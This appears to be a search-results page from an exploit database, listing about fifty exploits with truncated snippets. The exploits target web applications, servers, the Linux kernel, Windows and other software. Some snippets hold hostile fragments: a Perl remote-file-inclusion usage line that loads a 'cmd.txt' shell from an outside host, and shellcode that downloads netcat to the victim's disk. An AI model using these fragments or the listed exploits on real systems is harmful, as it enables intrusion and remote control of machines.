41207 matches found
FlashBB 1.1.8 - phpbb_root_path Remote File Inclusion
FlashBB 1.1.8 - phpbbrootpath Remote File Inclusion !/usr/bin/perl TUFaT FlashBB perl flashBB.pl http://target.com/flashbb http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; Contact: h4ntu [email protected] use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1;...
ezusermanager 1.6 - Remote File Inclusion
ezusermanager 1.6 - Remote File Inclusion Title : ezUserManager = v1.6 Remote File Inclusion Vulnerability - URL : http://www.ezusermanager.com/ - Dork : "powered by ezUserManager" - Author : OLiBekaS - contact : olibekasatgmail.com - greetz : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster a...
dotProject 2.0 - modulesprojectsgantt2.php?dPconfig[root_dir] Remote File Inclusion
dotProject 2.0 - modulesprojectsgantt2.php?dPconfigrootdir Remote File Inclusion source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input...
EnterpriseGS 1.0 rc4 - Remote Command Execution
EnterpriseGS 1.0 rc4 - Remote Command Execution works against PHP5 usage: launch from Apache, fill in requested fields, then go! Sun-Tzu: "Thus the energy developed by good fighting men is as the momentum of a round stone rolled down a mountain thousands of feet in height. So much on the subject ...
Veritas NetBackup 45 - Volume Manager Daemon Remote Buffer Overflow
Veritas NetBackup 45 - Volume Manager Daemon Remote Buffer Overflow / DESCRIPTION Veritas NetBackup Stack Overflow tcp/13701 "Volume Manager Daemon" Module Advisories http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336 http://www.frsirt.com/english/advisories/2005/2349 USAGE...
Multiple Vendor BIOS - Keyboard Buffer Password Persistence (2)
Multiple Vendor BIOS - Keyboard Buffer Password Persistence 2 // source: https://www.securityfocus.com/bid/15751/info Multiple vendors fail to clear the BIOS Basic Input-Output System keyboard buffer after reading the preboot authentication password during the system startup process. Depending on...
SoftBiz B2B trading Marketplace Script 1.1 - products.php?cid SQL Injection
SoftBiz B2B trading Marketplace Script 1.1 - products.php?cid SQL Injection source: https://www.securityfocus.com/bid/15652/info Softbiz B2B Trading Marketplace is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize...
Snort 2.4.0 2.4.3 - Back Orifice Pre-Preprocessor Remote (Metasploit)
Snort 2.4.0 2.4.3 - Back Orifice Pre-Preprocessor Remote Metasploit $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...
IPSwitch IMAP Server - LOGON Remote Stack Overflow
IPSwitch IMAP Server - LOGON Remote Stack Overflow / IpSwitch IMAP Server LOGON stack overflow. Software Hole discovered by iDEFENSE POC written by nolimit and BuzzDee First, some information for the few of you that know how this stuff works. The reason you see no SP2 or 2003 offsets is because o...
gld 1.4 - Postfix Greylisting Daemon Remote Format String
gld 1.4 - Postfix Greylisting Daemon Remote Format String / 0x82-meOw-linuxerforever - gld 1.4 remote overflow format string exploit. c 2005 Team INetCop Security. Nickname of this code is, Kill two bird with one stone.' or, One shot, two kill!.' hehehe ;-D Advisory URL:...
Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Remote (PoC)
Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Remote PoC / source: https://www.securityfocus.com/bid/11488/info It is reported that an integer underflow vulnerability is present in the iptables logging rules of the Linux kernel 2.6 branch. A remote attacker may exploit this...
WebHost Automation Helm Control Panel 3.1.x - Multiple Input Validation Vulnerabilities
WebHost Automation Helm Control Panel 3.1.x - Multiple Input Validation Vulnerabilities source: https://www.securityfocus.com/bid/11586/info Helm Control Panel is reported prone to multiple vulnerabilities. These include an SQL injection issue and an HTML injection vulnerability. A remote attacke...
Master of Orion III 1.2.5 - Denial of Service
Master of Orion III 1.2.5 - Denial of Service / by Luigi Auriemma / include include include ifdef WIN32 include / Header file used for manage errors in Windows It support socket and errno too this header replace the previous sockerrX.h / include include void stderrvoid char error;...
Apple Mac OSX - Panther Internet Connect Privilege Escalation
Apple Mac OSX - Panther Internet Connect Privilege Escalation Date: 25.07.2004 Author: B-r00t. 2004. Email: B-r00t Vendor: Apple Operating System: OSX Panther Possibly Previous Versions. Application: Internet Connect.app Tested: Panther 10.3.4 Internet Connect v1.3 Problem: Internet Connect allow...
Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)
Microsoft Windows Server 2000 - Utility Manager All-in-One MS04-019 / COROMPUTER2004 Crpt Utility Manager exploit v2.666 modified by kralor Crpt It gets system language and sets windows names to work on any win2k :P Feel free to add other languages : v2.666: added autonomous allinone remote...
NETObserve 2.0 - Authentication Bypass
NETObserve 2.0 - Authentication Bypass source: https://www.securityfocus.com/bid/9319/info NETObserve is prone to a vulnerability that may permit remote unauthenticated users to access functions of the software. Due to the nature of the software, this could permit an attacker to execute commands...
IA WebMail Server 3.x - iaregdll.dll 1.0.0.5 Remote Overflow
IA WebMail Server 3.x - iaregdll.dll 1.0.0.5 Remote Overflow !/usr/bin/perl -w IA WebMail 3.x iaregdll.dll version 1.0.0.5 Remote Exploit Application Specific Shellcode: URL Downloader - www elitehaven net/ncat.exe downloaded - c:\nc.exe created By Peter Winter-Smith peter4020 hotmail com Shellco...
DCP-Portal 5.5 - advertiser.php?Password SQL Injection
DCP-Portal 5.5 - advertiser.php?Password SQL Injection source: https://www.securityfocus.com/bid/8739/info Multiple SQL Injection vulnerabilities have been discovered that affect DCP-Portal scripts. These issues are likely due to a lack of sufficient sanitization performed on user supplied URI...
Cisco IOS - cisco-bug-44020.c IPv4 Packet Denial of Service
Cisco IOS - cisco-bug-44020.c IPv4 Packet Denial of Service // / cisco-bug-44020.c - Copyright by Martin Kluge [email protected] / / / / Feel free to modify this code as you like, as long as you include / / the above copyright statement. / / / / Please use this code only to check your OWN cisco...
OpenSSHPAM 3.6.1p1 - Remote Users Discovery Tool
OpenSSHPAM 3.6.1p1 - Remote Users Discovery Tool / SSHBRUTE - OpenSSH/PAM Proof of concept code by Maurizio Agazzini Tested against Red Hat, Mandrake, and Debian GNU/Linux. Reference: http://lab.mediaservice.net/advisory/2003-01-openssh.txt $ tar xvfz openssh-3.6.1p1.tar.gz $ patch -p0 include...
InstaBoard 1.3 - index.cfm SQL Injection
InstaBoard 1.3 - index.cfm SQL Injection source: https://www.securityfocus.com/bid/7338/info It has been reported that multiple input validation errors exist in the index.cfm file included with InstaBoard. Because of this issue, remote attackers may launch SQL injection attacks through the...
MySimpleNews 1.0 - PHP Injection
MySimpleNews 1.0 - PHP Injection source: https://www.securityfocus.com/bid/5865/info MySimpleNews allows users to enter news articles through a web interface. It will allow PHP code to be injected into URI parameters of the 'users.php' script, which will be stored into a MySimpleNews file...
NetBSD 1.x - TalkD User Validation
NetBSD 1.x - TalkD User Validation source: https://www.securityfocus.com/bid/4419/info talkd is a client-server application shipped with many Unix and Linux variants that is used for communication between users locally or remotely. talkd does not perform adequate validation of users making talk...
Phusion WebServer 1.0 - Directory Traversal (2)
Phusion WebServer 1.0 - Directory Traversal 2 source: https://www.securityfocus.com/bid/4117/info Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems. Phusion Webserver is prone to directory traversal attacks. It is possible to break out of...
Microsoft Index Server 2.0 - File Information Full Path Disclosure
Microsoft Index Server 2.0 - File Information Full Path Disclosure source: https://www.securityfocus.com/bid/3339/info The sqlqhit.asp sample file is used for performing web-based SQL queries. Malicious users could send specifically crafted HTTP request to an Internet Information Services server...
ID Software Quake 3 - SMURF Denial of Service
ID Software Quake 3 - SMURF Denial of Service // source: https://www.securityfocus.com/bid/3060/info Quake 3 network play features contain a remotely exploitable denial of service vulnerability. A hostile client program can be used by to generate a large number of forged client queries on behalf ...
Active Classifieds 1.0 - Arbitrary Code Execution
Active Classifieds 1.0 - Arbitrary Code Execution source: https://www.securityfocus.com/bid/2942/info Active Classifieds is a CGI package that provides an online classified advertisement listing and management system. An origin validation error exists in the Free Edition of Active Classifieds tha...
keware technologies homeseer 1.4 - Directory Traversal
keware technologies homeseer 1.4 - Directory Traversal source: https://www.securityfocus.com/bid/2085/info Keware Technologies HomeSeer is a home automation application which enables users to control various housewares and appliances locally or remotely via a web interface. It is possible for a...
PHP 3.0.164.0.2 - Remote Format Overflow
PHP 3.0.164.0.2 - Remote Format Overflow / PHP 3.0.16/4.0.2 remote format overflow exploit. Copyright c 2000 Field Marshal Count August Anton Wilhelm Neithardt von Gneisenau [email protected] my regards to sheib and darkx All rights reserved Pascal Boucheraine's paper was enlightening THERE IS...
LBL Traceroute 1.4 a5 - Heap Corruption (1)
LBL Traceroute 1.4 a5 - Heap Corruption 1 // source: https://www.securityfocus.com/bid/1739/info Traceroute is a well-known network diagnostic tool used for analyzing the path on a network between two hosts. On unix systems, traceroute is typically installed setuid root because of its use of raw...
xsoldier (FreeBSD 3.3Linux Mandrake 7.0) - Local Buffer Overflow (2)
xsoldier FreeBSD 3.3Linux Mandrake 7.0 - Local Buffer Overflow 2 / source: https://www.securityfocus.com/bid/871/info Certain versions of FreeBSD 3.3 Confirmed and Linux Mandrake confirmed ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid...
ETL Delegate 5.9.x6.0.x - Remote Buffer Overflow
ETL Delegate 5.9.x6.0.x - Remote Buffer Overflow // source: https://www.securityfocus.com/bid/808/info The Delegate proxy server from ElectroTechnical Laboratory has numerous several hundred, according to the orignal poster unchecked buffers that could be exploited to remotely compromise the...
Microsoft Windows NT 4.0SP1SP2SP3SP4SP5SP6 - Services.exe Denial of Service (1)
Microsoft Windows NT 4.0SP1SP2SP3SP4SP5SP6 - Services.exe Denial of Service 1 source: https://www.securityfocus.com/bid/754/info A specially crafted packet can cause a denial of service on an NT 4.0 host, rendering local administration and network communication nearly unusable. This attack will...
Caldera OpenUnix 8.0UnixWare 7.1.1 HP HP-UX 11.0 Solaris 7.0 SunOS 4.1.4 - rpc.cmsd Buffer Overflow (1)
Caldera OpenUnix 8.0UnixWare 7.1.1 HP HP-UX 11.0 Solaris 7.0 SunOS 4.1.4 - rpc.cmsd Buffer Overflow 1 // source: https://www.securityfocus.com/bid/524/info There is a remotely exploitable buffer overflow vulnerability in rpc.cmsd which ships with Sun's Solaris and HP-UX versions 10.20, 10.30 and...
Compaq Client Management Agents 3.704.0 Insight Management Agents 4.21 A4.22 A4.30 A Intelligent Cluster Administrator 1.0 Management Agents for Workstations 4.20 A Server Management Agents 4.23 Survey Utility 2.0 - Web File Access
Compaq Client Management Agents 3.704.0 Insight Management Agents 4.21 A4.22 A4.30 A Intelligent Cluster Administrator 1.0 Management Agents for Workstations 4.20 A Server Management Agents 4.23 Survey Utility 2.0 - Web File Access source: https://www.securityfocus.com/bid/282/info A vulnerabilit...
eLection 2.0 - id SQL Injection
eLection 2.0 - id SQL Injection Title: eLection 2.0 - 'id' SQL Injection Date: 2020-02-21 Exploit Author: J3rryBl4nks Vendor Homepage: https://sourceforge.net/projects/election-by-tripath/ Software Link: https://sourceforge.net/projects/election-by-tripath/files/Version 2.0 Tested on Ubuntu 19/Ka...
SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
SOPlanning 1.45 - Cross-Site Request Forgery Add User Exploit Title: SOPlanning 1.45 - Cross-Site Request Forgery Add User Date: 2020-02-14 Exploit Author: J3rryBl4nks Vendor Homepage: https://www.soplanning.org/en/ Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/...
phpMyChat Plus 1.98 - pmc_username SQL Injection
phpMyChat Plus 1.98 - pmcusername SQL Injection Title: phpMyChat Plus 1.98 - 'pmcusername' SQL Injection Date: 2020-02-13 Exploit Author: J3rryBl4nks Vendor Homepage: http://ciprianmp.com/latest/ Software Link: https://sourceforge.net/projects/phpmychat/files/phpMyChatPlus/ Version MyChat Plus 1....
DVD Photo Slideshow Professional 8.07 - Name Buffer Overflow
DVD Photo Slideshow Professional 8.07 - Name Buffer Overflow Exploit Title: DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow Exploit Author : ZwX Exploit Date: 2020-02-10 Vendor Homepage : http://www.picture-on-tv.com/ Tested on OS: Windows 10 v1803 Social: twitter.com/ZwX2a Steps t...
usersctp - Out-of-Bounds Reads in sctp_load_addresses_from_init
usersctp - Out-of-Bounds Reads in sctploadaddressesfrominit ''' usersctp is SCTP library used by a variety of software including WebRTC. There is a vulnerability in the sctploadaddressesfrominit function of usersctp that can lead to a number of out-of-bound reads. The input to...
Wago PFC200 - Authenticated Remote Code Execution (Metasploit)
Wago PFC200 - Authenticated Remote Code Execution Metasploit Exploit Title: Wago PFC200 - Authenticated Remote Code Execution Metasploit Date: 2020-02-05 Exploit Author: Nico Jansen 0x483d Vendor Homepage: https://www.wago.com/ Version: 'Wago PFC200 authenticated remote code execution',...
Hospital Management System 4.0 - Persistent Cross-Site Scripting
Hospital Management System 4.0 - Persistent Cross-Site Scripting Exploit Title: Hospital Management System 4.0 - Persistent Cross-Site Scripting Google Dork: N/A Date: 2020-01-02 Exploit Author: FULLSHADE Vendor Homepage: https://phpgurukul.com/ Software Link:...
SpotAuditor 5.3.2 - Base64 Local Buffer Overflow (SEH)
SpotAuditor 5.3.2 - Base64 Local Buffer Overflow SEH Exploit Title: SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow SEH Exploit Author: Kirill Nikolaev Date: 2019-12-06 Vulnerable Software: SpotAuditor Vendor Homepage: http://www.nsauditor.com/ Version: 5.3.2 Software Link:...
Nsauditor 3.1.8.0 - Name Denial of Service (PoC)
Nsauditor 3.1.8.0 - Name Denial of Service PoC Exploit Title: Nsauditor 3.1.8.0 - 'Name' Denial of Service PoC Discovery by: SajjadBnd Date: 2019-11-30 Vendor Homepage: http://www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Tested Version: 3.1.8.0...
InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC)
InduSoft Web Studio 8.1 SP1 - Atributos Denial of Service PoC Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" Denial of Service PoC Discovery by: chuyreds Discovery Date: 2019-11-23 Vendor Homepage: http://www.indusoft.com/ Software Link : http://www.indusoft.com/Products-Downloads Teste...
Adrenalin Core HCM 5.4.0 - strAction Reflected Cross-Site Scripting
Adrenalin Core HCM 5.4.0 - strAction Reflected Cross-Site Scripting Exploit Title: Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting Google Dork: NA Date: 2018-09-06 Exploit Author: Rishu Ranjan Cy83rl0gger Vendor Homepage: https://www.myadrenalin.com/ Software Link:...
Jenkins build-metrics plugin 1.3 - label Cross-Site Scripting
Jenkins build-metrics plugin 1.3 - label Cross-Site Scripting Exploit Title: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting Date: 2019-11-06 Exploit Author: vesche Austin Jackson Vendor Homepage: https://plugins.jenkins.io/build-metrics Version: Jenkins build-metrics plugin 1.3 a...
Ajenti 2.1.31 - Remote Code Exection (Metasploit)
Ajenti 2.1.31 - Remote Code Exection Metasploit Exploit Title: Ajenti 2.1.31 - Remote Code Exection Metasploit Date: 2019-10-29 Exploit Author: Onur ER Vendor Homepage: http://ajenti.org/ Software Link: https://github.com/ajenti/ajenti Version: 2.1.31 Tested on: Ubuntu 19.10 This module requires...
Joomla! 3.4.6 - Remote Code Execution (Metasploit)
Joomla! 3.4.6 - Remote Code Execution Metasploit Exploit Title: Joomla! 3.4.6 - Remote Code Execution Metasploit Google Dork: N/A Date: 2019-10-02 Exploit Author: Alessandro Groppo Vendor Homepage: https//www.joomla.it/ Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6 Version: 3.0...
Podman Varlink 1.5.1 - Remote Code Execution
Podman Varlink 1.5.1 - Remote Code Execution Exploit Title: Podman & Varlink 1.5.1 - Remote Code Execution Exploit Author: Jeremy Brown Date: 2019-10-15 Vendor Homepage: https://podman.io/ Software Link: dnf install podman or https://github.com/containers/libpod/releases Version: 1.5.1 Tested on:...